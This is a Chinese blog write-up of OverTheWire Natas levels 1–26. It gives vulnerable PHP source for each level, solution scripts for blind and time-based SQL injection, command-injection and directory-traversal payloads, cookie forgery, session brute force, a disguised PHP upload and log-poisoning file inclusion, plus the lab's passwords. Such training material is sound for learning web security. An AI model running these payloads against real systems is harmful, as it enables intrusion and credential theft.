Natas关卡学Web漏洞目前1~25关卡(write up)

于 2025-02-25 01:47:58 发布
阅读量687 收藏 12
点赞数 16
文章标签: natas 靶场 网络安全 burp suite wargames CTF web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_69100706/article/details/145817745
版权

注:每一关的账号为natas+x 其中x为关卡数,关卡通关的条件是得到下一关卡的password

        建议用 burp suite(方便且强大)

第一关:

You can find the password for the next level on this page,but rightclicking has been blocked!

你可以在这个页面上找到下一个级别的密码,但是右键被阻止了!

右键通常可以查看网页源代码,提示的很明显

F12,查看element,查看content得到

得到:<!--The password for natas2 is TguMNxKo1DSaltujBLuZJnDUlCcUAPII->

第二关:

F12

或者右键查看源码效果一样

有 files/pixel.png 提示,尝试

../../../files/

打开user.txt

得到:natas3:3gqisGdR0pjm6tpkDKdIWO2hSvchLeYH

第三关:

前两关菜鸟方法行不通了

需要了解robots.txt   robots.txt_web服务器上存在robot(s).txt-CSDN博客

../../../robots.txt/

../../../s3cr3t/

得到:natas4:QryZXc2e0zahULdHrtHxzyYkj59kUxLQ

第四关:

Access disallowed.You are visiting from "while authorized users should come only from
"http://natas5.natas.labs.overthewire.org/"

不允许访问。您是从“授权用户”访问的应该只来自“http://natas5.natas.labs.overthewire.org/”

需要点 refresh page  抓的包才有referer

右键 发送到 repeater(重放器)将referer的natas4改为natas5

得到:0n35PkggAPm2zbEpOU802c0x0Msn1ToK

第五关:

看抓包,logged=0

修改 logged=1

得到:natas6 0RoJwHdSKWFTYR5WuiAewauSuNaBXned

第六关:

查看 view sourcecode

<?

include "includes/secret.inc";

    if(array_key_exists("submit", $_POST)) {
        if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
    }
?>

尝试

../../../includes/secret.inc

FOEIUWGHFEEUHOFUOIU

得到:natas7 is bmg8SvU1LizuWjx3y7xkNERkHxGre0GS

第七关:

?page=/etc/natas_webpass/natas8

得到: natas8  xcoXLmzMkoIP9D7hlgPlh9XD7OgLAe5Q

第八关:

<?

$encodedSecret = "3d3d516343746d4d6d6c315669563362";

function encodeSecret($secret) {
    return bin2hex(strrev(base64_encode($secret)));
}

if(array_key_exists("submit", $_POST)) {
    if(encodeSecret($_POST['secret']) == $encodedSecret) {
    print "Access granted. The password for natas9 is <censored>";
    } else {
    print "Wrong secret";
    }
}
?>

import base64


secret="3d3d516343746d4d6d6c315669563362"

a=bytes.fromhex(secret)
reversed_str=a[::-1]
m=base64.b64decode(reversed_str)
print(m)

得到:natas9 is ZE1ck82lmdGIoErlhQgWND6j2Wzz6b6t

第九关:

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>
. /etc/natas_webpass/natas10 #

得到:natas10 t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu

第十关:

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>

得到:natas11 UJdqkK1pTu6VLt9UHWAgRZz6sVUZ3lEk

第十一关:

<?

$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

function xor_encrypt($in) {
    $key = '<censored>';
    $text = $in;
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
    $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }

    return $outText;
}

function loadData($def) {
    global $_COOKIE;
    $mydata = $def;
    if(array_key_exists("data", $_COOKIE)) {
    $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);
    if(is_array($tempdata) && array_key_exists("showpassword", $tempdata) && array_key_exists("bgcolor", $tempdata)) {
        if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) {
        $mydata['showpassword'] = $tempdata['showpassword'];
        $mydata['bgcolor'] = $tempdata['bgcolor'];
        }
    }
    }
    return $mydata;
}

function saveData($d) {
    setcookie("data", base64_encode(xor_encrypt(json_encode($d))));
}

$data = loadData($defaultdata);

if(array_key_exists("bgcolor",$_REQUEST)) {
    if (preg_match('/^#(?:[a-f\d]{6})$/i', $_REQUEST['bgcolor'])) {
        $data['bgcolor'] = $_REQUEST['bgcolor'];
    }
}

saveData($data);



?>
import base64
import json
from urllib.parse import unquote, quote

# 原始Cookie数据
original_cookie = "HmYkBwozJw4WNyAAFyB1VUcqOE1JZjUIBis7ABdmbU1GIjEJAyIxTRg%3D"

# 步骤1:解码Cookie
decoded_cookie = unquote(original_cookie)  # URL解码
ciphertext = base64.b64decode(decoded_cookie)  # Base64解码

# 步骤2:生成已知明文
default_data = {"showpassword": "no", "bgcolor": "#ffffff"}
plaintext = json.dumps(default_data, separators=(",", ":")).encode()  # 紧凑JSON格式

# 步骤3:计算XOR密钥流
key_stream = bytes([p ^ c for p, c in zip(plaintext, ciphertext)])

# 步骤4:自动检测重复密钥
def find_repeating_key(stream, max_len=20):
    for n in range(1, max_len+1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return None

key = find_repeating_key(key_stream)
print(f"[+] 破解密钥: {key.decode(errors='ignore')}")

# 步骤5:构造新数据并加密
new_data = {"showpassword": "yes", "bgcolor": "#ffffff"}
new_json = json.dumps(new_data, separators=(",", ":")).encode()
new_cipher = bytes([b ^ key[i % len(key)] for i, b in enumerate(new_json)])

# 步骤6:生成新Cookie
new_cookie = base64.b64encode(new_cipher).decode()
final_cookie = quote(new_cookie)  # URL编码特殊字符
print(f"[+] 新Cookie值: {final_cookie}")

# 使用此Cookie访问页面即可显示密码

[+] 破解密钥: eDWo
[+] 新Cookie值: HmYkBwozJw4WNyAAFyB1VUc9MhxHaHUNAic4Awo2dVVHZzEJAyIxCUc5

得到:The password for natas12 is yZdkjAYZRd3R7tq7T5kXMjMJlOIkzDeB

第十二关:

<?php

function genRandomString() {
    $length = 10;
    $characters = "0123456789abcdefghijklmnopqrstuvwxyz";
    $string = "";

    for ($p = 0; $p < $length; $p++) {
        $string .= $characters[mt_rand(0, strlen($characters)-1)];
    }

    return $string;
}

function makeRandomPath($dir, $ext) {
    do {
    $path = $dir."/".genRandomString().".".$ext;
    } while(file_exists($path));
    return $path;
}

function makeRandomPathFromFilename($dir, $fn) {
    $ext = pathinfo($fn, PATHINFO_EXTENSION);
    return makeRandomPath($dir, $ext);
}

if(array_key_exists("filename", $_POST)) {
    $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);


        if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
        echo "File is too big";
    } else {
        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
            echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
        } else{
            echo "There was an error uploading the file, please try again!";
        }
    }
} else {
?>

得到:trbs5pCjCrkuSknBBKHhaBxq6Wm1j3LC

第十三关:

<?php

function genRandomString() {
    $length = 10;
    $characters = "0123456789abcdefghijklmnopqrstuvwxyz";
    $string = "";

    for ($p = 0; $p < $length; $p++) {
        $string .= $characters[mt_rand(0, strlen($characters)-1)];
    }

    return $string;
}

function makeRandomPath($dir, $ext) {
    do {
    $path = $dir."/".genRandomString().".".$ext;
    } while(file_exists($path));
    return $path;
}

function makeRandomPathFromFilename($dir, $fn) {
    $ext = pathinfo($fn, PATHINFO_EXTENSION);
    return makeRandomPath($dir, $ext);
}

if(array_key_exists("filename", $_POST)) {
    $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);

    $err=$_FILES['uploadedfile']['error'];
    if($err){
        if($err === 2){
            echo "The uploaded file exceeds MAX_FILE_SIZE";
        } else{
            echo "Something went wrong :/";
        }
    } else if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
        echo "File is too big";
    } else if (! exif_imagetype($_FILES['uploadedfile']['tmp_name'])) {
        echo "File is not an image";
    } else {
        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
            echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
        } else{
            echo "There was an error uploading the file, please try again!";
        }
    }
} else {
?>

关键:生成的随机名称的.jpg 改为  .php  用GIF89a 骗过文件头校验

得到:GIF89az3UYcr4v4uBpeX8f7EZbMHlzK4UR2XtQ

第十四关:

<?php
if(array_key_exists("username", $_REQUEST)) {
    $link = mysqli_connect('localhost', 'natas14', '<censored>');
    mysqli_select_db($link, 'natas14');

    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    if(mysqli_num_rows(mysqli_query($link, $query)) > 0) {
            echo "Successful login! The password for natas15 is <censored><br>";
    } else {
            echo "Access denied!<br>";
    }
    mysqli_close($link);
} else {
?>

得到:natas15 is SdqIqBsFcz3yotlNYErZSZwblkm0lrvx

第十五关:

<?php

/*
CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);
*/

if(array_key_exists("username", $_REQUEST)) {
    $link = mysqli_connect('localhost', 'natas15', '<censored>');
    mysqli_select_db($link, 'natas15');

    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    $res = mysqli_query($link, $query);
    if($res) {
    if(mysqli_num_rows($res) > 0) {
        echo "This user exists.<br>";
    } else {
        echo "This user doesn't exist.<br>";
    }
    } else {
        echo "Error in query.<br>";
    }

    mysqli_close($link);
} else {
?>

import requests
from requests.auth import HTTPBasicAuth
import time

url = "http://natas15.natas.labs.overthewire.org/index.php"
auth = HTTPBasicAuth("natas15", "SdqIqBsFcz3yotlNYErZSZwblkm0lrvx")  # 使用新密码
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
password = ""
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36"}

for i in range(1, 33):  # 密码长度为 32
    for char in charset:
        payload = f'natas16" AND SUBSTRING(password, {i}, 1) = BINARY "{char}" -- '
        data = {"username": payload}
        try:
            response = requests.post(url, auth=auth, data=data, headers=headers, timeout=10)
            response.raise_for_status()  # 检查 HTTP 错误
            if "This user exists" in response.text:
                password += char
                print(f"[+] 第 {i} 位: {char} → 当前密码: {password}")
                break
            else:
                print(f"[-] 测试位置 {i} 字符 {char} → 无匹配")
        except requests.exceptions.RequestException as e:
            print(f"[!] 请求失败: {e}")
        time.sleep(0.5)  # 避免触发速率限制
print(f"[*] 最终密码: {password}")

得到:hPkjKYviLQctEW33QmuXL6eDVfMW4sGo

第十六关:

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&`\'"]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i \"$key\" dictionary.txt");
    }
}
?>
import requests

chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
password = ''
target = 'http://natas16.natas.labs.overthewire.org/'
auth = ('natas16', 'hPkjKYviLQctEW33QmuXL6eDVfMW4sGo')

for i in range(32):
    for c in chars:
        # 构造精准 payload
        url = f"{target}?needle=$(grep ^{password + c} /etc/natas_webpass/natas17)African"
        r = requests.get(url, auth=auth)
        
        # 关键判断:若 'African' 不在响应中,说明密码字符正确
        if 'African' not in r.text:
            password += c
            print(f'找到第 {i+1} 位: {c} → 当前密码: {password.ljust(32, "*")}')
            break
print(f'最终密码: {password}')

得到:EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC

第十七关:

<?php

/*
CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);
*/

if(array_key_exists("username", $_REQUEST)) {
    $link = mysqli_connect('localhost', 'natas17', '<censored>');
    mysqli_select_db($link, 'natas17');

    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    $res = mysqli_query($link, $query);
    if($res) {
    if(mysqli_num_rows($res) > 0) {
        //echo "This user exists.<br>";
    } else {
        //echo "This user doesn't exist.<br>";
    }
    } else {
        //echo "Error in query.<br>";
    }

    mysqli_close($link);
} else {
?>
import requests
url = 'http://natas17.natas.labs.overthewire.org/index.php'
username= 'natas17'
password= 'EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC'
key = ""
 
for pos in range(1, 33): # 32 位密码
    low = 48          # 这里采用 ascii 码来查找,最小的 ascii 为48
    high = 122        # 最大的 ascii 为48
    mid = (high+low)>>1        # 折半查找
    
    while mid<high:
        
        # 每次取 password 字段中的一位密码,最后用 "" like " 来闭合 sql 语句
        payload= "natas18\" and if(%d < ascii(mid(password,%d,1)), sleep(2), 1) and \"\" like \"" %  (mid, pos)
        try:
            req = requests.post(url, auth = requests.auth.HTTPBasicAuth(username,password),data={"username":payload}, timeout=2)
        except requests.exceptions.Timeout:
            low = mid + 1
            mid = (high+low)>>1
            continue
        
        high=mid 
        mid = (high+low)>>1 
    key+=chr(mid)
    print(key)

得到:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ

第十八关:

<?php

$maxid = 640; // 640 should be enough for everyone

function isValidAdminLogin() { /* {{{ */
    if($_REQUEST["username"] == "admin") {
    /* This method of authentication appears to be unsafe and has been disabled for now. */
        //return 1;
    }

    return 0;
}
/* }}} */
function isValidID($id) { /* {{{ */
    return is_numeric($id);
}
/* }}} */
function createID($user) { /* {{{ */
    global $maxid;
    return rand(1, $maxid);
}
/* }}} */
function debug($msg) { /* {{{ */
    if(array_key_exists("debug", $_GET)) {
        print "DEBUG: $msg<br>";
    }
}
/* }}} */
function my_session_start() { /* {{{ */
    if(array_key_exists("PHPSESSID", $_COOKIE) and isValidID($_COOKIE["PHPSESSID"])) {
    if(!session_start()) {
        debug("Session start failed");
        return false;
    } else {
        debug("Session start ok");
        if(!array_key_exists("admin", $_SESSION)) {
        debug("Session was old: admin flag set");
        $_SESSION["admin"] = 0; // backwards compatible, secure
        }
        return true;
    }
    }

    return false;
}
/* }}} */
function print_credentials() { /* {{{ */
    if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
    print "You are an admin. The credentials for the next level are:<br>";
    print "<pre>Username: natas19\n";
    print "Password: <censored></pre>";
    } else {
    print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas19.";
    }
}
/* }}} */

$showform = true;
if(my_session_start()) {
    print_credentials();
    $showform = false;
} else {
    if(array_key_exists("username", $_REQUEST) && array_key_exists("password", $_REQUEST)) {
    session_id(createID($_REQUEST["username"]));
    session_start();
    $_SESSION["admin"] = isValidAdminLogin();
    debug("New session started");
    $showform = false;
    print_credentials();
    }
}

if($showform) {
?>
import requests

url = 'http://natas18.natas.labs.overthewire.org/'
auth = ('natas18', '6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ')

for session_id in range(1, 641):
    cookies = {'PHPSESSID': str(session_id)}
    try:
        response = requests.get(url, auth=auth, cookies=cookies, timeout=5)
        if 'You are an admin' in response.text:
            print(f"[+] 成功找到有效会话ID: {session_id}")
            print("[+] 密码信息如下:")
            print(response.text.split('<pre>')[1].split('</pre>')[0])
            break
        else:
            print(f"[-] 尝试会话ID {session_id}:非管理员")
    except Exception as e:
        print(f"[!] 会话ID {session_id} 请求失败: {e}")

得到:tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr

第十九关:

import binascii

import requests

# proxie = {'http': 'http://127.0.0.1:8080'}
url = 'http://natas19.natas.labs.overthewire.org/'
header = {'Authorization': 'Basic bmF0YXMxOTp0bndFUjdQZGZXa3hzRzRGTldVdG9BWjlWeVpUSnFKcg=='}

for uid in range(91, 641):
    payload = str(uid) + '-admin'
    suid = str(binascii.b2a_hex(bytes(payload, encoding='utf-8')), encoding='utf8')
    cookie = {'__utma': '176859643.1701764875.1629551603.1632719883.1632842691.23',
              '__utmz': '176859643.1629551603.1.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic',
              '__utmb': '=176859643.3.10.1632842691',
              '__utmc': '176859643',
              '__utmt': '1',
              'PHPSESSID': suid}

    res = requests.get(url, headers=header, cookies=cookie)
    if 'You are an admin' in res.text:
        print(res.text)
        break
    else:
        print(str(uid) + ' failure')

得到:p5mCvP7GS2K6Bmt3gqhM2Fc1A5T8MVyw

第二十关:

<?php

function debug($msg) { /* {{{ */
    if(array_key_exists("debug", $_GET)) {
        print "DEBUG: $msg<br>";
    }
}
/* }}} */
function print_credentials() { /* {{{ */
    if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
    print "You are an admin. The credentials for the next level are:<br>";
    print "<pre>Username: natas21\n";
    print "Password: <censored></pre>";
    } else {
    print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas21.";
    }
}
/* }}} */

/* we don't need this */
function myopen($path, $name) {
    //debug("MYOPEN $path $name");
    return true;
}

/* we don't need this */
function myclose() {
    //debug("MYCLOSE");
    return true;
}

function myread($sid) {
    debug("MYREAD $sid");
    if(strspn($sid, "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM-") != strlen($sid)) {
    debug("Invalid SID");
        return "";
    }
    $filename = session_save_path() . "/" . "mysess_" . $sid;
    if(!file_exists($filename)) {
        debug("Session file doesn't exist");
        return "";
    }
    debug("Reading from ". $filename);
    $data = file_get_contents($filename);
    $_SESSION = array();
    foreach(explode("\n", $data) as $line) {
        debug("Read [$line]");
    $parts = explode(" ", $line, 2);
    if($parts[0] != "") $_SESSION[$parts[0]] = $parts[1];
    }
    return session_encode() ?: "";
}

function mywrite($sid, $data) {
    // $data contains the serialized version of $_SESSION
    // but our encoding is better
    debug("MYWRITE $sid $data");
    // make sure the sid is alnum only!!
    if(strspn($sid, "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM-") != strlen($sid)) {
    debug("Invalid SID");
        return;
    }
    $filename = session_save_path() . "/" . "mysess_" . $sid;
    $data = "";
    debug("Saving in ". $filename);
    ksort($_SESSION);
    foreach($_SESSION as $key => $value) {
        debug("$key => $value");
        $data .= "$key $value\n";
    }
    file_put_contents($filename, $data);
    chmod($filename, 0600);
    return true;
}

/* we don't need this */
function mydestroy($sid) {
    //debug("MYDESTROY $sid");
    return true;
}
/* we don't need this */
function mygarbage($t) {
    //debug("MYGARBAGE $t");
    return true;
}

session_set_save_handler(
    "myopen",
    "myclose",
    "myread",
    "mywrite",
    "mydestroy",
    "mygarbage");
session_start();

if(array_key_exists("name", $_REQUEST)) {
    $_SESSION["name"] = $_REQUEST["name"];
    debug("Name set to " . $_REQUEST["name"]);
}

print_credentials();

$name = "";
if(array_key_exists("name", $_SESSION)) {
    $name = $_SESSION["name"];
}

?>

关键:先发post请求  name注入  

name=test%0Aadmin%201

后切换为get请求 (没有name参数)

得到:Username: natas21  Password: BPhv63cKE1lkQl04cE5CuFTzXe15NfiH

第二十一关:

<?php

function print_credentials() { /* {{{ */
    if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
    print "You are an admin. The credentials for the next level are:<br>";
    print "<pre>Username: natas22\n";
    print "Password: <censored></pre>";
    } else {
    print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas22.";
    }
}
/* }}} */

session_start();
print_credentials();

?>
<?php

session_start();

// if update was submitted, store it
if(array_key_exists("submit", $_REQUEST)) {
    foreach($_REQUEST as $key => $val) {
    $_SESSION[$key] = $val;
    }
}

if(array_key_exists("debug", $_GET)) {
    print "[DEBUG] Session contents:<br>";
    print_r($_SESSION);
}

// only allow these keys
$validkeys = array("align" => "center", "fontsize" => "100%", "bgcolor" => "yellow");
$form = "";

$form .= '<form action="index.php" method="POST">';
foreach($validkeys as $key => $defval) {
    $val = $defval;
    if(array_key_exists($key, $_SESSION)) {
    $val = $_SESSION[$key];
    } else {
    $_SESSION[$key] = $val;
    }
    $form .= "$key: <input name='$key' value='$val' /><br>";
}
$form .= '<input type="submit" name="submit" value="Update" />';
$form .= '</form>';

$style = "background-color: ".$_SESSION["bgcolor"]."; text-align: ".$_SESSION["align"]."; font-size: ".$_SESSION["fontsize"].";";
$example = "<div style='$style'>Hello world!</div>";

?>

<p>Example:</p>
<?=$example?>

<p>

关键:a(原页面)的cookie给b(新页面)用burp suite时建议新开窗口

b 注入debug  和 admin=1   需要点update 抓包才能有相关参数

得到:Username: natas22 Password: d8rwGBl0Xslg3b76uh3fEbSlnOUBlozz

第二十二关:

<?php
session_start();

if(array_key_exists("revelio", $_GET)) {
    // only admins can reveal the password
    if(!($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1)) {
    header("Location: /");
    }
}
?>

得到:Username: natas23 Password: dIUQcI3uSus1JEOSSWRAEXBG8KbR8tRs

第二十三关:

<?php
    if(array_key_exists("passwd",$_REQUEST)){
        if(strstr($_REQUEST["passwd"],"iloveyou") && ($_REQUEST["passwd"] > 10 )){
            echo "<br>The credentials for the next level are:<br>";
            echo "<pre>Username: natas24 Password: <censored></pre>";
        }
        else{
            echo "<br>Wrong!<br>";
        }
    }
    // morla / 10111
?>

得到:Username: natas24 Password: MeuqmfJ8DDKuTr5pcvzFKSwlxedZYEWd

第二十四关:

<?php
    if(array_key_exists("passwd",$_REQUEST)){
        if(!strcmp($_REQUEST["passwd"],"<censored>")){
            echo "<br>The credentials for the next level are:<br>";
            echo "<pre>Username: natas25 Password: <censored></pre>";
        }
        else{
            echo "<br>Wrong!<br>";
        }
    }
    // morla / 10111
?>

得到:Username: natas25 Password: ckELKUWZUfpOv6uxS6M7lXBpBssJZ4Ws

第二十五关:

<?php
    // cheers and <3 to malvina
    // - morla

    function setLanguage(){
        /* language setup */
        if(array_key_exists("lang",$_REQUEST))
            if(safeinclude("language/" . $_REQUEST["lang"] ))
                return 1;
        safeinclude("language/en"); 
    }
    
    function safeinclude($filename){
        // check for directory traversal
        if(strstr($filename,"../")){
            logRequest("Directory traversal attempt! fixing request.");
            $filename=str_replace("../","",$filename);
        }
        // dont let ppl steal our passwords
        if(strstr($filename,"natas_webpass")){
            logRequest("Illegal file access detected! Aborting!");
            exit(-1);
        }
        // add more checks...

        if (file_exists($filename)) { 
            include($filename);
            return 1;
        }
        return 0;
    }
    
    function listFiles($path){
        $listoffiles=array();
        if ($handle = opendir($path))
            while (false !== ($file = readdir($handle)))
                if ($file != "." && $file != "..")
                    $listoffiles[]=$file;
        
        closedir($handle);
        return $listoffiles;
    } 
    
    function logRequest($message){
        $log="[". date("d.m.Y H::i:s",time()) ."]";
        $log=$log . " " . $_SERVER['HTTP_USER_AGENT'];
        $log=$log . " \"" . $message ."\"\n"; 
        $fd=fopen("/var/www/natas/natas25/logs/natas25_" . session_id() .".log","a");
        fwrite($fd,$log);
        fclose($fd);
    }
?>
<?php foreach(listFiles("language/") as $f) echo "<option>$f</option>"; ?>
</select>
</form>
</div>

<?php  
    session_start();
    setLanguage();
    
    echo "<h2>$__GREETING</h2>";
    echo "<p align=\"justify\">$__MSG";
    echo "<div align=\"right\"><h6>$__FOOTER</h6><div>";
?>

关键:get请求注入

?lang=....//....//....//....//....//var/www/natas/natas25/logs/natas25_km9vk0t9rhu3jh3o92do0aghio.log

user agent 注入

<? readfile("/etc/natas_webpass/natas26");?>

仔细核对 注入 不然没结果

得到:natas26 cVXXwxMS3Y26n5UZU89QgpGmWCelaQlE

第二十六关:

<?php
    // sry, this is ugly as hell.
    // cheers kaliman ;)
    // - morla

    class Logger{
        private $logFile;
        private $initMsg;
        private $exitMsg;

        function __construct($file){
            // initialise variables
            $this->initMsg="#--session started--#\n";
            $this->exitMsg="#--session end--#\n";
            $this->logFile = "/tmp/natas26_" . $file . ".log";

            // write initial message
            $fd=fopen($this->logFile,"a+");
            fwrite($fd,$this->initMsg);
            fclose($fd);
        }

        function log($msg){
            $fd=fopen($this->logFile,"a+");
            fwrite($fd,$msg."\n");
            fclose($fd);
        }

        function __destruct(){
            // write exit message
            $fd=fopen($this->logFile,"a+");
            fwrite($fd,$this->exitMsg);
            fclose($fd);
        }
    }

    function showImage($filename){
        if(file_exists($filename))
            echo "<img src=\"$filename\">";
    }

    function drawImage($filename){
        $img=imagecreatetruecolor(400,300);
        drawFromUserdata($img);
        imagepng($img,$filename);
        imagedestroy($img);
    }

    function drawFromUserdata($img){
        if( array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&
            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET)){

            $color=imagecolorallocate($img,0xff,0x12,0x1c);
            imageline($img,$_GET["x1"], $_GET["y1"],
                            $_GET["x2"], $_GET["y2"], $color);
        }

        if (array_key_exists("drawing", $_COOKIE)){
            $drawing=unserialize(base64_decode($_COOKIE["drawing"]));
            if($drawing)
                foreach($drawing as $object)
                    if( array_key_exists("x1", $object) &&
                        array_key_exists("y1", $object) &&
                        array_key_exists("x2", $object) &&
                        array_key_exists("y2", $object)){

                        $color=imagecolorallocate($img,0xff,0x12,0x1c);
                        imageline($img,$object["x1"],$object["y1"],
                                $object["x2"] ,$object["y2"] ,$color);

                    }
        }
    }

    function storeData(){
        $new_object=array();

        if(array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&
            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET)){
            $new_object["x1"]=$_GET["x1"];
            $new_object["y1"]=$_GET["y1"];
            $new_object["x2"]=$_GET["x2"];
            $new_object["y2"]=$_GET["y2"];
        }

        if (array_key_exists("drawing", $_COOKIE)){
            $drawing=unserialize(base64_decode($_COOKIE["drawing"]));
        }
        else{
            // create new array
            $drawing=array();
        }

        $drawing[]=$new_object;
        setcookie("drawing",base64_encode(serialize($drawing)));
    }
?>
<?php
    session_start();

    if (array_key_exists("drawing", $_COOKIE) ||
        (   array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&
            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET))){
        $imgfile="img/natas26_" . session_id() .".png";
        drawImage($imgfile);
        showImage($imgfile);
        storeData();
    }

?>

---------------------------为什么没有后面关卡,是php反序列化害了他------------------------------------------

攻略证明:

natas3:3gqisGdR0pjm6tpkDKdIWO2hSvchLeYH

natas4:QryZXc2e0zahULdHrtHxzyYkj59kUxLQ

natas5 is 0n35PkggAPm2zbEpOU802c0x0Msn1ToK

natas6 is 0RoJwHdSKWFTYR5WuiAewauSuNaBXned

$secret = "FOEIUWGHFEEUHOFUOIU"

natas7 is bmg8SvU1LizuWjx3y7xkNERkHxGre0GS

natas8 xcoXLmzMkoIP9D7hlgPlh9XD7OgLAe5Q

natas9 is ZE1ck82lmdGIoErlhQgWND6j2Wzz6b6t

natas10 t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu

natas11 UJdqkK1pTu6VLt9UHWAgRZz6sVUZ3lEk

The password for natas12 is yZdkjAYZRd3R7tq7T5kXMjMJlOIkzDeB

natas13 trbs5pCjCrkuSknBBKHhaBxq6Wm1j3LC

natas14 GIF89a z3UYcr4v4uBpeX8f7EZbMHlzK4UR2XtQ

natas15 is SdqIqBsFcz3yotlNYErZSZwblkm0lrvx

natas16 hPkjKYviLQctEW33QmuXL6eDVfMW4sGo

natas17 EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC

natas18 6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ

Username: natas19 Password: tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr

natas20 Password: p5mCvP7GS2K6Bmt3gqhM2Fc1A5T8MVyw

Username: natas21 Password: BPhv63cKE1lkQl04cE5CuFTzXe15NfiH

Username: natas22 Password: d8rwGBl0Xslg3b76uh3fEbSlnOUBlozz

Username: natas23 Password: dIUQcI3uSus1JEOSSWRAEXBG8KbR8tRs

Username: natas24 Password: MeuqmfJ8DDKuTr5pcvzFKSwlxedZYEWd

Username: natas25 Password: ckELKUWZUfpOv6uxS6M7lXBpBssJZ4Ws

natas26 cVXXwxMS3Y26n5UZU89QgpGmWCelaQlE

web向wargame:natas通关手记
陈文青
08-16 7669
与之前做过的跟ssh和终端打交道的题目不同,nat
OverTheWire的natas游戏(13-20)
qq_40710190的博客
07-08 335
natas solution(13-20) Natas Level 12 → Level 13 Username: natas13 URL: http://natas13.natas.labs.overthewire.org 这一关和上一关非常相似,不同的在于 <?php if(array_key_exists("filename", $_POST)) { $target_path = makeRandomPathFromFilename("upload", $_POST["fil
Wargames靶场natas(web安全)
weixin_50764099的博客
04-24 1031
Natas系列包含服务器端Web安全的基础知识。每个级别的 natas 都由位于处的自己的网站组成,其中 X 是级别 数。。要访问某个级别,请输入用户名 对于该级别(例如,NATAS0 表示级别 0)及其密码。每个级别都可以访问下一级的密码。你的任务是以某种方式获取下一个密码并升级。。例如,存储 natas5 的密码 在文件 /etc/natas_webpass/natas5 中,只有 natas4 和 纳塔斯5。
网络空间安全——Wargame靶场Natas
最新发布
weixin_44717952的博客
05-20 1509
